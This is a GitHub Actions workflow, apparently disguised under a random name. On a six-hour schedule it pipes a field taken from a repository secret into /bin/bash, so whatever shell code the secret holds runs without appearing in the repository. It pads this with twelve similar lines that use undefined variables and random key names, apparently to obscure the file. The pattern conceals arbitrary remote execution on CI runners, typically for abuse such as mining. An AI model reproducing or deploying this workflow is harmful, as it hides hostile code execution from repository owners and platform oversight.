name: hangyuuinuu

on:
  workflow_dispatch:
  schedule:
    - cron: '24 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: hangyuuinuu
        env:
          gr608: ${{ secrets.gr608 }}
        run: |
          echo $gr608 | jq -r .pzqut31 | /bin/bash
          echo $sk668 | jq -r .ps4 | /bin/bash
          echo $uqia6 | jq -r .zdtv739 | /bin/bash
          echo $q8 | jq -r .aij87864 | /bin/bash
          echo $vnj63338 | jq -r .awfji3349 | /bin/bash
          echo $mbw23 | jq -r .vauo6765 | /bin/bash
          echo $iypr5 | jq -r .h80818 | /bin/bash
          echo $l99812 | jq -r .nnia87 | /bin/bash
          echo $prpvx941 | jq -r .kl703 | /bin/bash
          echo $ztzpa12 | jq -r .p8943 | /bin/bash
          echo $mlyg4 | jq -r .jiz5 | /bin/bash
          echo $kyx4 | jq -r .n3373 | /bin/bash
          echo $qmj4 | jq -r .zpl57 | /bin/bash

